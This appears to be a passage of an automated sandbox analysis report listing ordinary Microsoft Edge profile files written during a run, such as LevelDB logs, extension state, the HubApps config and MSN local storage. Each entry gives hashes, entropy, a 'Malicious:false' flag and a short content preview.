                                                                                                                                                                                                                                                                                                                                SSDEEP:6:yM9N+q2P923oH+Tcwt8aPrqIFUt8hHZmw+hnVkwO923oH+Tcwt8amLJ:yv4YebL3FUt8N/+/5LYebQJ
                                                                                                                                                                                                                                                                                                                                MD5:4BF531924DDFA94DB7F2E9910651FBBB
                                                                                                                                                                                                                                                                                                                                SHA1:7FF36CA07066634D803AFFAF6292E2CC97B77D67
                                                                                                                                                                                                                                                                                                                                SHA-256:E65F0A3DA23E9E467E251B383203B8D5FD4C5FD5096A103B0228928B346F78EB
                                                                                                                                                                                                                                                                                                                                SHA-512:DF2F666B606C431BD12919471B522174A7A235FE3D1F2891330D45F467491508D436DC319870E0D9B33F1CFB8FE1B09EDA635D914CBFD365C318730F21F1DAA4
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:2024/10/28-17:02:19.811 1cf8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2024/10/28-17:02:19.812 1cf8 Recovering log #3.2024/10/28-17:02:19.812 1cf8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\000003.log

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):418
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
                                                                                                                                                                                                                                                                                                                                MD5:BF097D724FDF1FCA9CF3532E86B54696
                                                                                                                                                                                                                                                                                                                                SHA1:4039A5DD607F9FB14018185F707944FE7BA25EF7
                                                                                                                                                                                                                                                                                                                                SHA-256:1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
                                                                                                                                                                                                                                                                                                                                SHA-512:31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\LOG

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):328
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.158310378757905
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6:yDN+q2P923oH+Tcwt865IFUt8hsoU5Zmw+hsoUtVkwO923oH+Tcwt86+ULJ:YIv4Yeb/WFUt8PU5/+PUT5LYeb/+SJ
                                                                                                                                                                                                                                                                                                                                MD5:A0AC922153761C70D6568A6A58982101
                                                                                                                                                                                                                                                                                                                                SHA1:B4C40165F63EFE277FA6E9E4ECF253DBEFB96EA9
                                                                                                                                                                                                                                                                                                                                SHA-256:8573209DBB6C875432E8A13C727C3AD7B9151698A1E0AD98545A7100943E6ACE
                                                                                                                                                                                                                                                                                                                                SHA-512:DAD8733793DD5B498E284ABA41A63842F204D2007523D43A428B49C46D75431542B4BF25EDF448F0270908ED7F13B1248C274404E4100EFA4D0284736AD0B9A3
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:2024/10/28-17:02:19.818 1cf8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2024/10/28-17:02:19.824 1cf8 Recovering log #3.2024/10/28-17:02:19.824 1cf8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\LOG.old (copy)

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):328
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.158310378757905
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6:yDN+q2P923oH+Tcwt865IFUt8hsoU5Zmw+hsoUtVkwO923oH+Tcwt86+ULJ:YIv4Yeb/WFUt8PU5/+PUT5LYeb/+SJ
                                                                                                                                                                                                                                                                                                                                MD5:A0AC922153761C70D6568A6A58982101
                                                                                                                                                                                                                                                                                                                                SHA1:B4C40165F63EFE277FA6E9E4ECF253DBEFB96EA9
                                                                                                                                                                                                                                                                                                                                SHA-256:8573209DBB6C875432E8A13C727C3AD7B9151698A1E0AD98545A7100943E6ACE
                                                                                                                                                                                                                                                                                                                                SHA-512:DAD8733793DD5B498E284ABA41A63842F204D2007523D43A428B49C46D75431542B4BF25EDF448F0270908ED7F13B1248C274404E4100EFA4D0284736AD0B9A3
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:2024/10/28-17:02:19.818 1cf8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2024/10/28-17:02:19.824 1cf8 Recovering log #3.2024/10/28-17:02:19.824 1cf8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\000003.log

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1254
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:12:qWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWA:
                                                                                                                                                                                                                                                                                                                                MD5:826B4C0003ABB7604485322423C5212A
                                                                                                                                                                                                                                                                                                                                SHA1:6B8EF07391CD0301C58BB06E8DEDCA502D59BCB4
                                                                                                                                                                                                                                                                                                                                SHA-256:C56783C3A6F28D9F7043D2FB31B8A956369F25E6CE6441EB7C03480334341A63
                                                                                                                                                                                                                                                                                                                                SHA-512:0474165157921EA84062102743EE5A6AFE500F1F87DE2E87DBFE36C32CFE2636A0AE43D8946342740A843D5C2502EA4932623C609B930FE8511FE7356D4BAA9C
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5........

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):324
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.134216243133111
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6:yAXVq2P923oH+Tcwt8NIFUt8hAXgZmw+hAXIkwO923oH+Tcwt8+eLJ:5v4YebpFUt8b/+x5LYebqJ
                                                                                                                                                                                                                                                                                                                                MD5:900E0BC09ABEE3F5BC09FAE615B1AA1A
                                                                                                                                                                                                                                                                                                                                SHA1:63C1C9700001A60ECEE6E34244B7668D0F59849D
                                                                                                                                                                                                                                                                                                                                SHA-256:C4BC467DBD599FB4868BC33C77D6AF5B5D11120349EC54C59F63AEF969E66CFA
                                                                                                                                                                                                                                                                                                                                SHA-512:70AAEF5379D07ECEF03EDBD02B7611FC5AEFD8E0D364143C116C207649BA171AA265E5DC77830B570F1F23151606041887349A0DCD8DEE6591972A5F58D173C9
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:2024/10/28-17:02:20.487 1d34 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/10/28-17:02:20.487 1d34 Recovering log #3.2024/10/28-17:02:20.487 1d34 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG.old (copy)

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):324
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.134216243133111
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6:yAXVq2P923oH+Tcwt8NIFUt8hAXgZmw+hAXIkwO923oH+Tcwt8+eLJ:5v4YebpFUt8b/+x5LYebqJ
                                                                                                                                                                                                                                                                                                                                MD5:900E0BC09ABEE3F5BC09FAE615B1AA1A
                                                                                                                                                                                                                                                                                                                                SHA1:63C1C9700001A60ECEE6E34244B7668D0F59849D
                                                                                                                                                                                                                                                                                                                                SHA-256:C4BC467DBD599FB4868BC33C77D6AF5B5D11120349EC54C59F63AEF969E66CFA
                                                                                                                                                                                                                                                                                                                                SHA-512:70AAEF5379D07ECEF03EDBD02B7611FC5AEFD8E0D364143C116C207649BA171AA265E5DC77830B570F1F23151606041887349A0DCD8DEE6591972A5F58D173C9
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:2024/10/28-17:02:20.487 1d34 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/10/28-17:02:20.487 1d34 Recovering log #3.2024/10/28-17:02:20.487 1d34 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\jmjflgjpcpepeafmmgdpfkogkghcpiha\1.2.1_0\_metadata\computed_hashes.json

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):429
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.809210454117189
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6:Y8U0vEjrAWT0VAUD9lpMXO4SrqiweVHUSENjrAWT0HQQ9/LZyVMQ3xqiweVHlrSQ:Y8U5j0pqCjJA7tNj0pHx/LZ4hcdQ
                                                                                                                                                                                                                                                                                                                                MD5:5D1D9020CCEFD76CA661902E0C229087
                                                                                                                                                                                                                                                                                                                                SHA1:DCF2AA4A1C626EC7FFD9ABD284D29B269D78FCB6
                                                                                                                                                                                                                                                                                                                                SHA-256:B829B0DF7E3F2391BFBA70090EB4CE2BA6A978CCD665EEBF1073849BDD4B8FB9
                                                                                                                                                                                                                                                                                                                                SHA-512:5F6E72720E64A7AC19F191F0179992745D5136D41DCDC13C5C3C2E35A71EB227570BD47C7B376658EF670B75929ABEEBD8EF470D1E24B595A11D320EC1479E3C
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:{"file_hashes":[{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","6RbL+qKART8FehO4s7U0u67iEI8/jaN+8Kg3kII+uy4=","CuN6+RcZAysZCfrzCZ8KdWDkQqyaIstSrcmsZ/c2MVs="],"block_size":4096,"path":"content.js"},{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","UL53sQ5hOhAmII/Yx6muXikzahxM+k5gEmVOh7xJ3Rw=","u6MdmVNzBUfDzMwv2LEJ6pXR8k0nnvpYRwOL8aApwP8="],"block_size":4096,"path":"content_new.js"}],"version":2}

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):8720
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):0.21838546206064954
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:K9tFlljq7A/mhWJFuQ3yy7IOWU+fKtdweytllrE9SFcTp4AGbNCV9RUIbn:775fOcfKtd0Xi99pEYl
                                                                                                                                                                                                                                                                                                                                MD5:E8B2AC0AA0FCFDC968465D9DB558AD5C
                                                                                                                                                                                                                                                                                                                                SHA1:7F6A283A415E71EBF0A7E27989881E8AC7DA1F94
                                                                                                                                                                                                                                                                                                                                SHA-256:50B78C90ED7DADC1A646744BF9FB74EADDD78194EAFCBF1BCB21103D316A0C6C
                                                                                                                                                                                                                                                                                                                                SHA-512:1F4B2FC7E68B1D300EE492924E1F2CCE3F7B903099752EE9DEBD5C66D1C48BF3E3B8C19189F32FD4133E1D88F8D8625201E80E0389A3A1FB4131CA972C759458
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:..............."...&....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HubApps (copy)

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):115717
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.183660917461099
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                                                                                                                                                                                                                MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                                                                                                                                                                                                                SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                                                                                                                                                                                                                SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                                                                                                                                                                                                                SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HubApps Icons

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 11, cookie 0x3, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):45056
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):3.918414601255008
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:384:jj9P0PQkQerkjly773pLDcIgam6IkP/Kbt/RKToaADhf:jdUe2mly7O/UP/iRKc39
                                                                                                                                                                                                                                                                                                                                MD5:5AB92321902A0ABFA27D09411BAC43DB
                                                                                                                                                                                                                                                                                                                                SHA1:26F9287A309CEC9D52CF6BA78E1EC8A2CAC71DB6
                                                                                                                                                                                                                                                                                                                                SHA-256:EE4D9D5BBE4C844F47CCFE3909E15AE2FC4FAC945DC279969F93CF94ACA58C95
                                                                                                                                                                                                                                                                                                                                SHA-512:971AFC8CD4F487D0FA8C4B0318C4443192B6FFE7EE2E51B204F3D66A6212746436DDCD00B22F116741EED02FFF4D99BD1D349B37C8F70687E791DE9E1CAF2E80
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...:.8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\LOG

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):408
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.255335448059778
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:12:j7L+v4Yeb8rcHEZrELFUt8fZ/+flLV5LYeb8rcHEZrEZSJ:I4Yeb8nZrExg8fIlLYeb8nZrEZe
                                                                                                                                                                                                                                                                                                                                MD5:E00ADC39D82222B1198DD6D8DF57728E
                                                                                                                                                                                                                                                                                                                                SHA1:F3D8FDE2CC0BA1CAF8242EBD769B46FC38E20C26
                                                                                                                                                                                                                                                                                                                                SHA-256:132AA60040D7755689EB11340DEDD354A60EA299422F65520E45DC00739F6C74
                                                                                                                                                                                                                                                                                                                                SHA-512:9885DB92AEA6D268021FC3475E42331596B324BFC27C485F430F671E65890BD636694133A05D86D2CE5F62D6B9A6E315E850D525B7B121D8E32C49B57D692011
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:2024/10/28-17:02:25.185 1d1c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2024/10/28-17:02:25.186 1d1c Recovering log #3.2024/10/28-17:02:25.186 1d1c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\LOG.old (copy)

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):408
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.255335448059778
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:12:j7L+v4Yeb8rcHEZrELFUt8fZ/+flLV5LYeb8rcHEZrEZSJ:I4Yeb8nZrExg8fIlLYeb8nZrEZe
                                                                                                                                                                                                                                                                                                                                MD5:E00ADC39D82222B1198DD6D8DF57728E
                                                                                                                                                                                                                                                                                                                                SHA1:F3D8FDE2CC0BA1CAF8242EBD769B46FC38E20C26
                                                                                                                                                                                                                                                                                                                                SHA-256:132AA60040D7755689EB11340DEDD354A60EA299422F65520E45DC00739F6C74
                                                                                                                                                                                                                                                                                                                                SHA-512:9885DB92AEA6D268021FC3475E42331596B324BFC27C485F430F671E65890BD636694133A05D86D2CE5F62D6B9A6E315E850D525B7B121D8E32C49B57D692011
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:2024/10/28-17:02:25.185 1d1c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2024/10/28-17:02:25.186 1d1c Recovering log #3.2024/10/28-17:02:25.186 1d1c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1655
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.679766151443929
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:48:nZguI2YoUNbXZeMQV03Sx4/MUWkNzOu3fHHQ2ztPFX:nOuIRoUNDoMmpgbZRJ
                                                                                                                                                                                                                                                                                                                                MD5:8A2A029909EB58D252164E6C4F7DA6BD
                                                                                                                                                                                                                                                                                                                                SHA1:DA30CD8DAF1BD731144CAA2253A9989087FAF5AE
                                                                                                                                                                                                                                                                                                                                SHA-256:CE8B06BF89A4CE87104715199BA438FCE78D268B1136424EA596C0FE6DD034A1
                                                                                                                                                                                                                                                                                                                                SHA-512:40CBBB08D71C586E49A63CF9135CBF005B411B26DA18E856FB9A6ADDB04D886CF1D39994D375A8BB88358B213CF9E397ABC345EC051E212E489A44F7460B0DA8
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:.Q{................VERSION.1..META:https://ntp.msn.com............_https://ntp.msn.com..FallbackNavigationResult?.{"r":"edgenext-base-v1-empty. NetworkCall","ic":true,"te":790}.!_https://ntp.msn.com..LastKnownPV..1730149367325.-_https://ntp.msn.com..LastVisuallyReadyMarker..1730149369574.._https://ntp.msn.com..MUID!.31232435889767F20B43311389B266D3.._https://ntp.msn.com..bkgdV...{"cachedVideoId":-1,"lastUpdatedTime":1730149367425,"schedule":[-1,16,34,18,-1,-1,-1],"scheduleFixed":[-1,16,34,18,-1,-1,-1],"simpleSchedule":[32,39,40,9,36,24,26]}.%_https://ntp.msn.com..clean_meta_flag..1.5_https://ntp.msn.com..enableUndersideAutoOpenFromEdge..false.7_https://ntp.msn.com..nurturing_interaction_trace_ls_id..1730149367296.&_https://ntp.msn.com..oneSvcUniTunMode..header."_https://ntp.msn.com..pageVersions..{"dhp":"20241025.434"}.*_https://ntp.msn.com..pivotSelectionSource..sticky.#_https://ntp.msn.com..selectedPivot..myFeed.5_https://ntp.msn.com..ssrBasePageCachingFeatureActive..true.#_http

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):336
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.12127006698217
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6:yb0N+q2P923oH+Tcwt8a2jMGIFUt8ho65Zmw+hCFINVkwO923oH+Tcwt8a2jMmLJ:HIv4Yeb8EFUt8665/+H5LYeb8bJ
                                                                                                                                                                                                                                                                                                                                MD5:2E6BF45A914350017D7F19291EDEE9C0
                                                                                                                                                                                                                                                                                                                                SHA1:63DE8DB5A947618A77390F7B78519C349181A0C5
                                                                                                                                                                                                                                                                                                                                SHA-256:C0A50B015F2778CF0B6ADCDD5F0A3E694525C69403D24CCADAAFD93B11AA0E87
                                                                                                                                                                                                                                                                                                                                SHA-512:3C92D2F25A85E39126FEA24A9ABF44E47552AAA4FE095C2738747D4D23924C29E5ECF87E3B9601336AF1BBF899FD5D43421A77007987988C42C8964F83DA943E
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:2024/10/28-17:02:20.034 19e8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/10/28-17:02:20.037 19e8 Recovering log #3.2024/10/28-17:02:20.039 19e8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG.old (copy)

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):336
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.12127006698217
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6:yb0N+q2P923oH+Tcwt8a2jMGIFUt8ho65Zmw+hCFINVkwO923oH+Tcwt8a2jMmLJ:HIv4Yeb8EFUt8665/+H5LYeb8bJ
                                                                                                                                                                                                                                                                                                                                MD5:2E6BF45A914350017D7F19291EDEE9C0
                                                                                                                                                                                                                                                                                                                                SHA1:63DE8DB5A947618A77390F7B78519C349181A0C5
                                                                                                                                                                                                                                                                                                                                SHA-256:C0A50B015F2778CF0B6ADCDD5F0A3E694525C69403D24CCADAAFD93B11AA0E87
                                                                                                                                                                                                                                                                                                                                SHA-512:3C92D2F25A85E39126FEA24A9ABF44E47552AAA4FE095C2738747D4D23924C29E5ECF87E3B9601336AF1BBF899FD5D43421A77007987988C42C8964F83DA943E
                                                                                                                                                                                                                                                                                                                                Malicious:false
